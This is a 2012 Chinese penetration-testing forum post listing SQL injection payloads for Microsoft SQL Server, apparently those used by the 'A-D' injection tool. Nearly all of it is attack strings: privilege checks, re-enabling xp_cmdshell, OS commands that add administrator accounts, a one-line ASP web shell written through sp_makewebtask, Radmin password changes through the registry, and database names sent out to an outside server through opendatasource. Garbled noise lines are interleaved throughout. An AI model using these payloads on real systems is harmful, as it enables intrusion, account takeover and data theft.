中国网络渗透测试联盟
标题:
阿D常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-13 17:26
标题:
阿D常用的一些注入命令
阿D常用的一些注入命令
: R+ q4 a( j% c7 _+ R& t
//看看是什么权限的
# `8 J' Q9 U1 w- r: j7 T
and 1=(Select IS_MEMBER('db_owner'))
: w8 v2 F9 y* _; D3 H1 Q' q
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
% l2 T$ Y, H* N: r$ G5 q
; c2 z- e4 F0 Z; \
//检测是否有读取某数据库的权限
6 S2 N9 [- G) T+ M. P
and 1= (Select HAS_DBACCESS('master'))
$ N3 B0 h4 C, C& h( j; o! F
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
' V- e' N4 _ |" A4 s4 c1 ?
" ]' v5 R! q0 i# w% y
5 C( m: |; b4 _0 \
数字类型
5 y* T4 ] | ^* t) y0 C
and char(124)%2Buser%2Bchar(124)=0
) M* A# r( r4 k! d! g3 j+ P
1 }9 t) T! \7 w: l7 |: Z4 }. h
字符类型
, _! C: h. D/ P4 n9 |5 a
' and char(124)%2Buser%2Bchar(124)=0 and ''='
. N5 P( N3 H' T) m$ P' r6 Y
$ b% l' `0 P2 D; A
搜索类型
) F, t7 o& Y. }/ E9 v8 Z, T
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
/ I+ `# U! f) J0 b/ G
z3 {7 H& ?) ?! o- w4 Q9 F
爆用户名
* ~$ x7 Z5 t/ G& o) N
and user>0
* E+ @6 [- J, \7 Q
' and user>0 and ''='
7 ~8 I$ }4 I. c$ H7 i; M9 o
" @6 g9 n# e0 S8 ]- Z( v6 @2 N* s
检测是否为SA权限
+ Q) _' O& u. n! l0 r
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
: [6 m+ S/ `4 H
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
3 S% l* O& H0 r; M2 X/ c/ r
5 O0 T( X9 _: v! S+ W
检测是不是MSSQL数据库
: u1 a5 ~- u; J" d
and exists (select * from sysobjects);--
0 x7 O3 I+ Y9 |2 x% P" J
R( g6 C; g( r% K( R( n( c
检测是否支持多行
* I5 I/ d: {9 H" E8 y2 d
;declare @d int;--
) ? C! t9 y1 B5 c- e
* @4 x- i# t8 H
恢复 xp_cmdshell
' L! c9 k+ m; c
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
2 H0 o9 m% S2 }
o; N J- `, u5 v( T$ C! A
! W5 k+ k. L) P! ?& e
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
7 A) k# Q8 @. L& N: D, q3 i
* @( ]' D+ L2 O, S
//-----------------------
: l- F7 G" _' V- \: M
// 执行命令
: \$ S- m3 _$ _' H
//-----------------------
; p `' ^8 T; u" P
首先开启沙盘模式:
! Y7 X# W8 T5 m6 h! o$ E, k
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
+ c9 ` C; v, @. }+ A; @! F S
+ d* J1 o0 p" S# G7 A
然后利用jet.oledb执行系统命令
5 X N/ c% M# H
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
4 F/ Y0 ^! S* x
3 r7 i/ ^- Z* z, b D& F+ ?
执行命令
( o3 I- S2 F E, O% \
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
! ]% {1 w2 J/ {; |
3 f/ b N7 U X) S
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
) t5 ~& p0 o; N% r' p; v6 [) m
% I$ S# j) W4 R$ q6 y' H) {* i
判断xp_cmdshell扩展存储过程是否存在:
' I* S; m( d" W: O
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
4 r* r6 ]" J* P5 F- {6 I8 N, z
~" `% H) F* a
写注册表
. L; @7 J7 W& H& h+ d
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, b7 @9 I" R6 s9 f
) m& |3 o! S3 U3 O! E
REG_SZ
: W" s% K/ [+ d- {3 c
* @/ I3 ?% \7 ]5 m# A
读注册表
8 X( e2 l* O% O% N2 E' `$ P4 m$ E& X; b
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
2 H# T$ y# R# ]% \$ D
( r6 D/ O6 D# U4 u& b
读取目录内容
, H/ o% _% g. ~
exec master..xp_dirtree 'c:\winnt\system32\',1,1
$ k! W V% t# E+ V6 I5 B' F( H
0 |; {" q0 M6 ~& w. L: j
+ I% B4 T( o9 E% X+ U" ?6 w) N
数据库备份
: B2 f G' E5 g) d! X
backup database pubs to disk = 'c:\123.bak'
& G. T/ z- I8 N3 u
% E/ z4 k B" ^- E/ _' ]0 R' J
//爆出长度
+ }4 f1 A0 p* M6 Q+ l1 c9 N: y
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
$ {3 T: u# y; I& s0 X9 _, d
/ w1 Y& n6 F8 a9 E
$ m1 Y9 D/ l/ o
5 I3 v4 W' ^ y% j0 L; L; F- x6 |
更改sa口令方法:用sql综合利用工具连接后,执行命令:
% j; | G. N3 o8 u% Y3 P" E8 F0 x
exec sp_password NULL,'新密码','sa'
f/ X) `' s- l5 F( E
) A P2 [' v9 }. `+ ~- ]
添加和删除一个SA权限的用户test:
( S) `& ?# S+ `2 y# k3 A; e
exec master.dbo.sp_addlogin test,ptlove
* N! \$ k3 K. d: a" @7 K$ `
exec master.dbo.sp_addsrvrolemember test,sysadmin
# t& Z4 u# X5 q. U" E$ Y. q1 t2 Y) U! {
1 x" b/ v3 g' }4 J0 j' z! W, X
删除扩展存储过过程xp_cmdshell的语句:
0 J4 l. Y5 _' |2 n0 R
exec sp_dropextendedproc 'xp_cmdshell'
0 q; P3 N. l3 \5 o; Q3 k; @" f+ Z
$ S3 G, @& N$ B/ X
添加扩展存储过过程
0 W+ E# l; y! r/ ~5 s
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
5 ]" A* g2 y) d$ w* p' j3 F
GRANT exec On xp_proxiedadata TO public
. ^* E( o7 P2 D4 D R2 g+ f) }+ g
9 c/ g9 X$ e" ~ m
! t( s) H- B+ i" _5 [
停掉或激活某个服务。
# O3 G0 `. J/ C, _! \8 K
* u; x5 I9 H9 Z* X, Y
exec master..xp_servicecontrol 'stop','schedule'
" \5 T+ a: `5 k9 o
exec master..xp_servicecontrol 'start','schedule'
& z4 H9 k \' `( v4 {. ]
0 |6 B# O3 Y9 b! u. ^+ f3 f* f
dbo.xp_subdirs
0 a/ j" a# H/ K: H
6 x1 r+ K- ~) }4 ^
只列某个目录下的子目录。
, x# P/ L: {# @: x c; n9 y2 e
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
8 V: t' P+ ?* \
! J& ^* q/ R( z0 C
dbo.xp_makecab
0 [' p& n0 T9 @
3 K( \/ g% _6 C. k3 N# i
将目标多个档案压缩到某个目标档案之内。
/ G9 `! e, Z- n9 o
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
% D0 h, Q" R& a0 e, @
6 c1 H6 x0 w$ M; @9 v$ ~( P
dbo.xp_makecab
`0 F; L* ~9 H, E& w
'c:\test.cab','mszip',1,
* l* R& [% e1 J! j0 u6 n
'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 R( a2 ^% N) a
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
" p o ^# [4 A
2 O& }& `3 Q2 F, X+ C# ] g' {
xp_terminate_process
) x* x0 Q% b. V* j4 w# [, y
4 ^! e3 ^% E5 ^
停掉某个执行中的程序,但赋予的参数是 Process ID。
! a$ S/ `# k& L; Z
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
+ P/ u0 W, U0 t% e' U. Z) ~0 h) ^
2 a# |3 V/ r/ j7 _5 }
xp_terminate_process 2484
: t9 ^' R8 Y2 { P+ R9 _# y% m
1 K% O& l% ]1 P: F t
xp_unpackcab
& I8 _7 A q# x3 u
) V5 o. Y8 c- [) S) Z4 m1 d
解开压缩档。
4 g! j" Z$ U& E2 j
- c) i+ k3 a% j7 I
xp_unpackcab 'c:\test.cab','c:\temp',1
( a' Z+ F5 j% N- ^2 Q
! u M0 c- f% H# B
) Z. ^9 M0 P+ k# m
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
+ i, u0 x' U, p. I! N
7 i; n2 N3 h G, F0 e- W0 W
create database lcx;
) v3 ^: ~5 ^( T5 H/ x3 {
Create TABLE ku(name nvarchar(256) null);
* T) q8 i$ y- a: `1 z7 e7 i
Create TABLE biao(id int NULL,name nvarchar(256) null);
" s- A4 `4 r0 Y$ `7 y
' N* |. A1 @) v' u
//得到数据库名
) \0 b4 y( w" \6 Y( ^, ?
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
. l/ x' g" U7 K
( ?, R# o- i9 u7 x* B7 A- ~! o0 J3 L
$ X% ]+ x% @- R, Z& _9 |
//在Master中创建表,看看权限怎样
, e& Z3 D& ^$ I" L7 e/ z2 l
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
: S) A/ B( p. [( d
9 p$ R9 ~" d5 s' x+ G
用 sp_makewebtask直接在web目录里写入一句话马:
0 F& X1 @( }! s+ |
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
. F7 y+ G5 b* @- z) T
# O6 p" D8 J% G1 C) {9 d( l+ |
//更新表内容
6 L% [+ ~& y0 H+ D9 s+ w m
Update films SET kind = 'Dramatic' Where id = 123
! }7 m5 d) b3 x) r/ t2 x8 O) k0 U8 b( k8 u
' r3 n, g! p) ~4 ^" e+ Z( Q
//删除内容
% L7 A) M2 U7 i* P+ \
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2